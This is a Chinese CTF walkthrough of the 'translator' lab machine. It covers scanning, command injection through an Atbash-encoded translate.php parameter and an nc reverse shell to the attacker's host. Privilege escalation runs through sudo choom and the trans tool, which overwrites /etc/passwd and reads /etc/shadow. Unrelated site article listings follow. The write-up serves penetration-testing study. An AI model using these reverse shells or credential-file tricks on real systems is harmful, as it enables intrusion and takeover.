translator-sudo-l

简介: translator-sudo-l


translator easy 命令执行、sudo提权、trans 提权

主机发现

netdiscover -i eth0 -r 192.168.44.193/24

服务探测

nmap -sV -A -T4 -p- 192.168.44.134

得到只开放了80和22端口

目录爆破

加上-e参数能带着url一起输出路径更好点击访问

gobuster dir -u http://192.168.44.134/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php -e

只是个输入框,尝试输入,发现我们输入的字符被替换了然后显示

尝试发现是26个字母倒叙替换

也可以通过https://www.dcode.fr/cipher-identifier 发现是使用atbash编码

但我直接写了个脚本

import sys

def reverse_alphabet_substitution(text):
    # 定义倒序字母映射字典
    reversed_alphabet = {
        'A': 'Z', 'B': 'Y', 'C': 'X', 'D': 'W', 'E': 'V',
        'F': 'U', 'G': 'T', 'H': 'S', 'I': 'R', 'J': 'Q',
        'K': 'P', 'L': 'O', 'M': 'N', 'N': 'M', 'O': 'L',
        'P': 'K', 'Q': 'J', 'R': 'I', 'S': 'H', 'T': 'G',
        'U': 'F', 'V': 'E', 'W': 'D', 'X': 'C', 'Y': 'B',
        'Z': 'A',
    }

    # 使用映射字典替换文本中的字母
    result = ''.join(reversed_alphabet.get(c.upper(), c) for c in text)

    return result.lower()

args = sys.argv

print(args[1])
# 示例文本
input_text = args[1]

# 应用替换函数
output_text = reverse_alphabet_substitution(input_text)

print(output_text)

命令执行nc反弹SHELL

sh -i >& /dev/tcp/ 192.168.44.128 / 9001 0>&1不行

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ python translater.py nc+-e+/bin/bash+192.168.44.128+9001
nc+-e+/bin/bash+192.168.44.128+9001
mx -v /yrm/yzhs 192.168.44.128 9001

访问`http://192.168.44.134/translate.php?hmv=rw;mx -v /yrm/yzhs 192.168.44.128 9001

刚监听的shell不太好用,使用下面这条命令打开一个pty伪终端

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm //设置终端类型为常见的xterm环境变量
stty -a//以容易阅读的方式打印当前的所有配置
stty raw -echo;fg//- 通过 `stty raw -echo` 将当前终端设置为原始模式并关闭回显。接着,使用分号 `;` 立即执行下一条命令。最后,`fg` 命令将最近放入后台的作业切换到前台运行,此时由于终端已处于原始模式且回显关闭,该作业可以直接接收用户的无干扰、未经处理的键盘输入。
reset //重新初始化终端

提权

使用sudo进行Linux权限升级技巧 - 渗透测试中心 - 博客园

配置 sudo 命令在运行时而不输入密码。 |此设置在 /etc/sudoers文件中完成,这是使用 sudo 命令的默认安全策略;在用户权限指定部分

尝试读取第一个flag读取不到cat /home/ocean/user.txt

cat hvxivg

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ python translater.py Mb+kzhhdliw+rh+zbfie3w4          
Mb+kzhhdliw+rh+zbfie3w4
ny password is ayurv3d4

利用sudo 提权到india 账号

https://gtfobins.github.io/gtfobins/choom/

su ocean //输入密码:ayurv3d4
sudo -l
//发现有个(india) NOPASSWD: /usr/bin/choom   这可以让我免密提权至india用户权限

也可以直接ssh:`ssh ocean@192.168.44.134

choom 命令是 util-linux 软件包的一部分

不会用这个命令就去找man:choom(1) - Linux manual page

Ubuntu Manpage: choom - display and adjust OOM-killer score.

sudo -u india /usr/bin/choom -n 0 /bin/sh
script /dev/null -c bash
sudo -l //(root) NOPASSWD: /usr/local/bin/trans
sudo -u root /usr/local/bin/trans//尝试以root权限运行该翻译软件
man /usr/local/bin/trans   //不会就问man,查看帮助命令

cat /etc/passwd发现可以显示,添加root用户

cat /etc/passwd
cp /etc/passwd /tmp/passwd.bak
cp /etc/passwd /tmp/file
在kali中生成一个密码
mkpasswd -m sha-512
复制值到file的最后一行中,并按照格式修改成root用户hack:$6$8NJrwgxTZMywbrec$f7JVOZGjIXI0UnN6Ovdv0kzyqiWkhqpIgBOyJOX2AHX4Z4SGuBo8D17cYAolVkVbEtNwQ75ze90uhHbIsA21a0:0:0:root:/root:/bin/bash

sudo -u root /usr/local/bin/trans -i /tmp/file -o /etc/passwd -no-auto
su hack //密码:123
root@translator:~# cat root.txt
h87M5364V2343ubvgfy
root@translator:~# cat /home/ocean/user.txt
a6765hftgnhvugy473f

方法二:

利用trans 进行提权,命令介绍:https://www.jianshu.com/p/da570df21ae8

这个是google的shell下翻译工具,所以google需要科学上网,我们在后面加上了-x代理,成功读取到shadow文件

sudo /usr/local/bin/trans -i /etc/shadow -x http://192.168.31.11:7890 -no-auto

sudo /usr/local/bin/trans -i /root/root.txt -x http://192.168.31.11:7890 -no-auto

读取后使用john 进行爆破,但是没有爆破出来。

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

也可以通过如下命令直接提权到root,反正我是不成功

sudo /usr/local/bin/trans -pager less -x http://192.168.31.11:7890


相关文章
|
22天前
|
弹性计算 人工智能 架构师
阿里云携手Altair共拓云上工业仿真新机遇
2024年9月12日,「2024 Altair 技术大会杭州站」成功召开,阿里云弹性计算产品运营与生态负责人何川,与Altair中国技术总监赵阳在会上联合发布了最新的“云上CAE一体机”。
阿里云携手Altair共拓云上工业仿真新机遇
|
15天前
|
存储 关系型数据库 分布式数据库
GraphRAG:基于PolarDB+通义千问+LangChain的知识图谱+大模型最佳实践
本文介绍了如何使用PolarDB、通义千问和LangChain搭建GraphRAG系统,结合知识图谱和向量检索提升问答质量。通过实例展示了单独使用向量检索和图检索的局限性,并通过图+向量联合搜索增强了问答准确性。PolarDB支持AGE图引擎和pgvector插件,实现图数据和向量数据的统一存储与检索,提升了RAG系统的性能和效果。
|
19天前
|
机器学习/深度学习 算法 大数据
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
2024“华为杯”数学建模竞赛,对ABCDEF每个题进行详细的分析,涵盖风电场功率优化、WLAN网络吞吐量、磁性元件损耗建模、地理环境问题、高速公路应急车道启用和X射线脉冲星建模等多领域问题,解析了问题类型、专业和技能的需要。
2570 22
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
|
17天前
|
人工智能 IDE 程序员
期盼已久!通义灵码 AI 程序员开启邀测,全流程开发仅用几分钟
在云栖大会上,阿里云云原生应用平台负责人丁宇宣布,「通义灵码」完成全面升级,并正式发布 AI 程序员。
|
1天前
|
存储 人工智能 搜索推荐
数据治理,是时候打破刻板印象了
瓴羊智能数据建设与治理产品Datapin全面升级,可演进扩展的数据架构体系为企业数据治理预留发展空间,推出敏捷版用以解决企业数据量不大但需构建数据的场景问题,基于大模型打造的DataAgent更是为企业用好数据资产提供了便利。
152 2
|
19天前
|
机器学习/深度学习 算法 数据可视化
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
2024年中国研究生数学建模竞赛C题聚焦磁性元件磁芯损耗建模。题目背景介绍了电能变换技术的发展与应用,强调磁性元件在功率变换器中的重要性。磁芯损耗受多种因素影响,现有模型难以精确预测。题目要求通过数据分析建立高精度磁芯损耗模型。具体任务包括励磁波形分类、修正斯坦麦茨方程、分析影响因素、构建预测模型及优化设计条件。涉及数据预处理、特征提取、机器学习及优化算法等技术。适合电气、材料、计算机等多个专业学生参与。
1565 16
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
|
2天前
|
JSON 自然语言处理 数据管理
阿里云百炼产品月刊【2024年9月】
阿里云百炼产品月刊【2024年9月】,涵盖本月产品和功能发布、活动,应用实践等内容,帮助您快速了解阿里云百炼产品的最新动态。
阿里云百炼产品月刊【2024年9月】
|
21天前
|
编解码 JSON 自然语言处理
通义千问重磅开源Qwen2.5,性能超越Llama
击败Meta,阿里Qwen2.5再登全球开源大模型王座
920 14
|
16天前
|
人工智能 开发框架 Java
重磅发布!AI 驱动的 Java 开发框架:Spring AI Alibaba
随着生成式 AI 的快速发展,基于 AI 开发框架构建 AI 应用的诉求迅速增长,涌现出了包括 LangChain、LlamaIndex 等开发框架,但大部分框架只提供了 Python 语言的实现。但这些开发框架对于国内习惯了 Spring 开发范式的 Java 开发者而言,并非十分友好和丝滑。因此,我们基于 Spring AI 发布并快速演进 Spring AI Alibaba,通过提供一种方便的 API 抽象,帮助 Java 开发者简化 AI 应用的开发。同时,提供了完整的开源配套,包括可观测、网关、消息队列、配置中心等。
684 9
|
15天前
|
存储 监控 调度
云迁移中心CMH:助力企业高效上云实践全解析
随着云计算的发展,企业上云已成为创新发展的关键。然而,企业上云面临诸多挑战,如复杂的应用依赖梳理、成本效益分析等。阿里云推出的云迁移中心(CMH)旨在解决这些问题,提供自动化的系统调研、规划、迁移和割接等功能,简化上云过程。CMH通过评估、准备、迁移和割接四个阶段,帮助企业高效完成数字化转型。未来,CMH将继续提升智能化水平,支持更多行业和复杂环境,助力企业轻松上云。